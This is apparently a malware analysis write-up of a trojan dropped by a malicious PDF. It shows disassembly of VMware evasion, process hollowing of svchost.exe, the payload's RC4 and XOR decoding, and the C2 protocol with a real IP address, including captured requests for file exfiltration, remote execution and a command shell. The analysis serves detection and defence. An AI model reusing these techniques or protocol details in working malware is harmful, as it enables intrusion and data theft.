msupdate.exe / favorites.dat Analysis

This analysis will focus on the payload of the PDF referenced here:

• http://contagiodump.blogspot.com/2010/09/sep-16-cve-2010-2883-pdf-interest.html#more

• This malicious PDF drops a malicious file with the following characteristics:

File Name:  setup.exe
File Size:  139264 bytes
MD5:        95d42d365489a6e5ebdf62565c5c8aa2
SHA1:       18f9862d4e3dda663d808300b8f56cf143c72beb
PE Time:    0x4C8F4139 [Tue Sep 14 09:32:41 2010 UTC]
AV:         23/43 hits [VirusTotal]

• File setup.exe is VMWare aware and will not drop its payload if it detects VMWare.
• The Trojan uses the SIDT instruction to detect VMWare.
• The code responsible for this is shown below (if AL = 0xFF –> VMWare):

0040176B   .  8D85 D8FDFFFF      LEA EAX, DWORD PTR SS:[EBP-228]
00401771   .  0F0108             SIDT FWORD PTR DS:[EAX]
00401774   .  8A40 05            MOV AL, BYTE PTR DS:[EAX+5]
00401777   .  3C FF              CMP AL, 0FF
00401779   .  75 07              JNZ SHORT setup.00401782

• This appears to have been the case in this ThreatExpert report:
  • http://www.threatexpert.com/report.aspx?md5=95d42d365489a6e5ebdf62565c5c8aa2
• Once you get past this little annoyance, setup.exe drops two files on the system:

File Name:  msupdater.exe
File Path:  C:\Documents and Settings\username\Local Settings\Application Data\
File Size:  49152 bytes
MD5:        374075ce8b6e8f0cd1f90009fd5a703b
SHA1:       c209a16144222cdd74f371d6782dc6ee6a52612d
PE Time:    0x4C8F40EF [Tue Sep 14 09:31:27 2010 UTC]
AV:         34/42 hits [VirusTotal]
Note:       The timestamps of this file are backdated to match those of svchost.exe

File Name:  FAVORITES.DAT
File Path:  C:\Documents and Settings\username\Local Settings\Application Data\
File Size:  40960 bytes
MD5:        869b0629330955506799047700bf317a
SHA1:       f1b7af06dfed4af027f4f321c5b635eb4637bbc4
AV:         (This file is encrypted)
Note:       The timestamps of this file are backdated to match those of svchost.ex

• File setup.exe entrenches msupdater.exe in the registry under:
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    • Shell: Explorer.exe “C:\Documents and Settings\username\Local Settings\Application Data\msupdater.exe”
• File msupdater.exe is executed, while file setup.exe is deleted.
• File msupdater.exe is also VMWare aware using the same method as above to detect VMWare:

0040181E  |.  0F0108        SIDT FWORD PTR DS:[EAX]
00401821  |.  8A40 05       MOV AL, BYTE PTR DS:[EAX+5]
00401824  |.  3C FF         CMP AL, 0FF
00401826  |.  75 1B         JNZ SHORT msupdate.00401843
00401828  |.  6A 02         PUSH 2                                     ; /Style = MB_ABORTRETRYIGNORE|MB_APPLMODAL
0040182A  |.  68 90804000   PUSH msupdate.00408090                     ; |Title = "ERROR"
0040182F  |.  68 7C804000   PUSH msupdate.0040807C                     ; |Text = "Invalid parameter"
00401834  |.  6A 00         PUSH 0                                     ; |hOwner = NULL
00401836  |.  FF15 0C714000 CALL DWORD PTR DS:[<&USER32.MessageBoxA>]  ; \MessageBoxA

• The execution of this file in this ThreatExpert report appears to have gone down this execution path:
  • http://www.threatexpert.com/report.aspx?md5=374075ce8b6e8f0cd1f90009fd5a703b
• Once you get past the VMWare detection, file msupdater.exe opens file FAVORITES.DAT and decrypts it using a 128-bit RC4 key.
• The RC4 key is derived from hashing the string: ’643kll;;
• The MD5 hash value of these 9 bytes is: 2D2514364E07A23E9375D25A857B33B6
• This MD5 hash value serves as the 128-bit RC4 key.
• The decrypted version of FAVORITES.DAT, which I will call favorites.exe, has the following characteristics:

File Name:  favorites.exe
File Size:  40960 bytes
MD5:        5e3eaca3806769836c3ad9d46a209644
SHA1:       21c84d776a757e63e97c6faadf4855774613bf22
PE Time:    0x4C8F40BB [Tue Sep 14 09:30:35 2010 UTC]
AV:         8/43 hits [VirusTotal

• Once FAVORITES.DAT is decrypted, msupdater.exe starts an instance of svchost.exe in suspended mode:

0040143F  |.  56            PUSH ESI                                         ; /pProcessInfo
00401440  |.  50            PUSH EAX                                         ; |pStartupInfo
00401441  |.  53            PUSH EBX                                         ; |CurrentDir => NULL
00401442  |.  53            PUSH EBX                                         ; |pEnvironment => NULL
00401443  |.  6A 04         PUSH 4                                           ; |CreationFlags = CREATE_SUSPENDED
00401445  |.  53            PUSH EBX                                         ; |InheritHandles => FALSE
00401446  |.  53            PUSH EBX                                         ; |pThreadSecurity => NULL
00401447  |.  8D45 F0       LEA EAX, DWORD PTR SS:[EBP-10]                   ; |
0040144A  |.  53            PUSH EBX                                         ; |pProcessSecurity => NULL
0040144B  |.  50            PUSH EAX                                         ; |CommandLine
0040144C  |.  53            PUSH EBX                                         ; |ModuleFileName => NULL
0040144D  |.  C745 BC 01010>MOV DWORD PTR SS:[EBP-44], 101                   ; |
00401454  |.  66:895D C0    MOV WORD PTR SS:[EBP-40], BX                     ; |
00401458  |.  FF15 58704000 CALL DWORD PTR DS:[<&KERNEL32.CreateProcessA>]   ; \CreateProcessA

• It then replaces the code of svchost.exe with that of the decrypted version of favorites.dat in memory:

00401698  |.  6A 00         PUSH 0                                 ; /pBytesWritten = NULL
0040169A  |.  8B48 3C       MOV ECX, DWORD PTR DS:[EAX+3C]         ; |
0040169D  |.  FF75 1C       PUSH DWORD PTR SS:[EBP+1C]             ; |BytesToWrite
004016A0  |.  8B45 18       MOV EAX, DWORD PTR SS:[EBP+18]         ; |
004016A3  |.  50            PUSH EAX                               ; |Buffer
004016A4  |.  895401 34     MOV DWORD PTR DS:[ECX+EAX+34], EDX     ; |
004016A8  |.  FF75 FC       PUSH DWORD PTR SS:[EBP-4]              ; |Address
004016AB  |.  FF75 C4       PUSH DWORD PTR SS:[EBP-3C]             ; |hProcess
004016AE  |.  FFD6          CALL ESI                               ; \WriteProcessMemory

The STACK looks like this:

0012F834   00000068  h...  |hProcess = 00000068 (window)
0012F838   00400000  ..@.  |Address = 400000
0012F83C   00890000  ..‰.  |Buffer = 00890000
0012F840   0000C000  .À..  |BytesToWrite = C000 (49152.)
0012F844   00000000  ....  \pBytesWritten = NULL

• The execution of “svchost.exe” is then resumed.

ANALYSIS OF FAVORITES.EXE

File Name:  favorites.exe
File Size:  40960 bytes
MD5:        5e3eaca3806769836c3ad9d46a209644
SHA1:       21c84d776a757e63e97c6faadf4855774613bf22
PE Time:    0x4C8F40BB [Tue Sep 14 09:30:35 2010 UTC]
AV:         8/43 hits [VirusTotal

Subroutine: 00401A20

• Here the Trojan contains code that writes the Command and Control
  (C2) IP address using move instructions. The C2 node IP address
  is: 140.112.19.195.
• It appears this Trojan can be loaded with up to three different
  domain/IP addresses. In this instance all three entries point to
  IP address 140.112.19.195 over TCP port 80.
• The Trojan also writes to memory the embedded string BHI06233.

Subroutine: 00404610

• The Trojan first obtains the serial number of the partition where
  %systemroot% is stored (so, typically the volume serial number of
  C:\). This value is a DWORD.
• It then obtains a random number.
• It then creates an ASCII representation of the concatenation of the volume serial number (in my case 40739B4C ) and the decimal value of the random number (in my case 5559d). So, in my example we have: 40739B4C5559.

Subroutine: 004041C0

• The Trojan loads the embedded string: ldd46!yo by using move instructions.
• String ldd46!yo is used as an XOR key to obfuscate the string: 40739B4C5559
• In addition to the XOR operation, the Trojan also SHR 4 and adds 0x41 to the resulting byte.

0040421D  |.  8A1C08        |MOV BL, BYTE PTR DS:[EAX+ECX]       ;  Plain Text
00404220  |.  8A442C 18     |MOV AL, BYTE PTR SS:[ESP+EBP+18]    ;  XOR key: ldd46!yo
00404224  |.  32D8          |XOR BL, AL
00404226  |.  8D4C24 12     |LEA ECX, DWORD PTR SS:[ESP+12]
0040422A  |.  8AD3          |MOV DL, BL
0040422C  |.  C0EA 04       |SHR DL, 4
0040422F  |.  80C2 41       |ADD DL, 41 

• The result of this operation produces one byte of the output.
• Furthermore, 0×41 is added to the lower nibble of the BL (i.e. the result of the XOR operation) as shown below:

00404254  |.  80E3 0F       |AND BL, 0F        ;  Lower nibble of BL
 *
 *
 *
0040426E  |.  80C3 41       |ADD BL, 41
00404271  |.  83E1 03       |AND ECX, 3

• This operation produces the second byte of output.
• So, this algorithm is a way of encoding the plain text data such that for each plain text byte we end up with two encoded bytes.
• The encoding of 40739B4C5559 in this manner produces: FIFEFDAHAPGDENCMFJFFFFAD
• Similarly, the Trojan encodes the machine name (in my case victim –> BKANAHEAFPEM)

Subroutine: 00404350

• The decimal representation of the system’s IP address is generated.

Subroutine: 00401CE0

• Trojan first beacons to www.google.com. This is a decoy beacon that does not affect the behavior of the Trojan in any way:

GET /search?qu= HTTP/1.1
User-Agent: Firefox/2.0.0.2
Host: www.google.com
Content-Length: 4
Connection: Keep-Alive

news

• The Trojan then puts together the GET request for the C2 node:

GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible;BKANAHEAFPEM;)
Host: 140.112.19.195
Connection: Keep-Alive

• Where: search5 is a hardcoded value, whereas: 5910 is a random number.
• And: ?h1= is hardcoded, whereas: 51 is the Windows version (i.e. Win XP 5.1)
• And: &h2=1&h3= is hardcoded, as is: BHI06233
• And: &h4= is hardcoded, whereas: FIFEFDAHAPGDENCMFOFMFMAEAE is the encoded (volume serial number concatenated with a random number)
• And: BKANAHEAFPEM is the encoded machine name (in this case victim).
• The rest of this HTTP header is hardcoded and loaded using move instructions.

COMMUNICATION PROTOCOL

• Subroutine 004041A0 is where all incoming and outgoing traffic is obfuscated (minus the HTTP header) by XOR-ing each byte with 0xBE.
• In addition to the HTTP header (which is ignored), the Trojan expects the first beacon
  received from the C2 node to start with byte 0xFD, which when XOR-ed
  with 0xBE produces 0×43 or ASCII C.

004020F4   .  3C 43             CMP AL, 43
004020F6   .  0F85 86000000     JNZ favorite.00402182

• This part of the communication protocol can be thought of as a simple authentication mechanism.
• Once authenticated, the Trojan starts a new thread (0×00402380) to handle the rest of the communication with the C2 node.

TROJAN FUNCTIONALITY

• The Trojan continues the communication with the C2 node by sending this GET request:

GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.2)
Host: 140.112.19.195
Connection: Keep-Alive

• Where: search6 is a hardcoded value, whereas: 13522 is a random number.
• And: ?h1= is hardcoded, whereas: FIFEFDAHAPGDENCMFOFMFMAEAE is the
  encoded (volume serial number concatenated with a random number)
• Every other part of the HTTP header is hardcoded.
• Notice that the user agent is now different from before.

=========================================================

• Here is a list of the commands that do something useful:

Command: 0x0000003D – Download file to victim

• This command takes two arguments: a file length and filename.
• Here is an example as it may appear on the wire (this is the decrypted version):

0000h: 3D 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00  =...............
0010h: 74 65 73 74 2E 65 78 65                          test.exe

• So, here we have the command (0x3D), the length of the file that will be downloaded (0×10 in this test case) and the filename that will be created on the victim system.
• The Trojan then sends this request to the C2 node:

GET /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Windows NT 5.1)
Host: 140.112.19.195
Connection: Keep-Alive

• The C2 node then replies with the encrypted data of the file.

Command: 0x0000003E – Upload file from victim

• This command takes one argument: a filename.
• Here is an example as it may appear on the wire (this is the decrypted version):

0000h: 3E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >...............
0010h: 65 78 66 69 6C 2E 74 78 74                       exfil.txt

• The Trojan then sends this POST request to the C2 node followed by the encrypted data of the requested file (shown as a hex dump):

POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.2)
Host: 140.112.19.195
Content-Length: 41
Connection: Keep-Alive
Cache-Control: no-cache

000000D8  ea d6 d7 cd 9e d7 cd 9e  cd d1 d3 db 9e da df ca ........ ........
000000E8  df 9e cc db cd d7 da d7  d0 d9 9e d1 d0 9e ca d6 ........ ........
000000F8  db 9e c8 d7 dd ca d7 d3  90                      ........ .

Command: 0x0000003F – Execute a file

• This command takes one argument: a filename.
• Here is an example as it may appear on the wire (this is the decrypted version):

0000h: 3F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ?...............
0010h: 62 69 6E 74 65 78 74 2E 65 78 65                 bintext.exe

• The Trojan executes the specified file.

Command: 0×00000040 – Command Shell

• This command takes no arguments.
• The Trojan executes cmd.exe on the local machine and sends the following POST request to the C2 node:

POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH HTTP/1.1
User-Agent: Mozilla/5.0 (compatible;Windows NT 5.1)
Host: 140.112.19.195
Content-Length: 127
Connection: Keep-Alive
Cache-Control: no-cache

000000CD  f3 d7 dd cc d1 cd d1 d8  ca 9e e9 d7 d0 da d1 c9 ........ ........
000000DD  cd 9e e6 ee 9e e5 e8 db  cc cd d7 d1 d0 9e 8b 90 ........ ........
000000ED  8f 90 8c 88 8e 8e e3 b3  b4 96 fd 97 9e fd d1 ce ........ ........
000000FD  c7 cc d7 d9 d6 ca 9e 8f  87 86 8b 93 8c 8e 8e 8f ........ ........
0000010D  9e f3 d7 dd cc d1 cd d1  d8 ca 9e fd d1 cc ce 90 ........ ........
0000011D  b3 b4 b3 b4 fd 84 e2 fa  d1 dd cb d3 db d0 ca cd ........ ........
0000012D  9e df d0 da 9e ed db ca  ca d7 d0 d9 cd e2 cb cd ........ ........
0000013D  db cc d0 df d3 db e2 fa  db cd d5 ca d1 ce 80    ........ .......

• Here are the rest of the commands that do something useful.

Command: 0×00000042 – Disconnect and sleep for 2 minutes.

Command: 0×00000045 – List running processes.

Command: 0×00000046 – Kill a process.

Command: 0×00000049 – Current directory listing.

Command: 0x0000004A – Directory listing of specified directory.

Command: 0x0000004D – Change the current working directory.

Command: 0x0000004E – Copy a file to the current working directory.

Command: 0x0000004F – Delete a file.

Command: 0×00000050 – Disconnect and sleep for 2 minutes.

Command: 0×00000051 – Retrieve victim’s system name and IP address(es).

Command: 0×00000053 – net view type results reported to C2 node.

Command: 0×00000054 – Change the Last Modified time of a file to match that of cmd.exe.